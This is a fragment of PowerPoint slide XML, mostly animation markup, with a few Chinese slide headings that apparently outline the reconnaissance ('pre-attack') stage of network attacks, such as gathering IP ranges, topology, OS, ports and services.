                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>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14761"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714761"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="73" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="74" fill="hold">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714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71476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714762"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714762"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="86" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="87" fill="hold">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714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>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714763"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714763"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="99" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="100" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="101" presetID="17" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>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714765"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714765"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714765"/>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7" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>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7" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>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714766"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714766"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7147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animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714757" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714758" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714759" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714760" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714761" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714762" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714763" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714764" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714765" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714766" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714767" grpId="0" animBg="1"/>
      <p:bldP spid="714768" grpId="0" animBg="1"/>
      <p:bldP spid="714769" grpId="0" animBg="1"/>
      <p:bldP spid="714770" grpId="0" animBg="1"/>
      <p:bldP spid="714771" grpId="0" animBg="1"/>
      <p:bldP spid="714772" grpId="0" animBg="1"/>
      <p:bldP spid="714773" grpId="0" animBg="1"/>
      <p:bldP spid="714774" grpId="0" animBg="1"/>
      <p:bldP spid="71477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攻击的一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过程及目的、内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51248" name="Group 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="499864" y="1447800"/>
            <a:ext cx="2111374" cy="4551363"/>
            <a:chOff x="580" y="912"/>
            <a:chExt cx="1330" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51228" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="605" y="1335"/>
              <a:ext cx="1305" cy="705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="9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4" name="Group 44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="580" y="912"/>
              <a:ext cx="1330" cy="2867"/>
              <a:chOff x="580" y="912"/>
              <a:chExt cx="1330" cy="2867"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51225" name="Text Box 25"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="580" y="912"/>
                <a:ext cx="13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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>预</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>攻击</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51226" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="605" y="2040"/>
                <a:ext cx="1305" cy="1739"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="9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27" name="Text Box 27"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="652" y="2087"/>
                <a:ext cx="1258" cy="1386"/>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内容：</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>获得域名及</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>IP</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>分布</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获得拓扑及</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>OS</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>等</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获得端口和服务</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获得应用系统情况</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跟踪新漏洞发布</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51229" name="Text Box 29"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
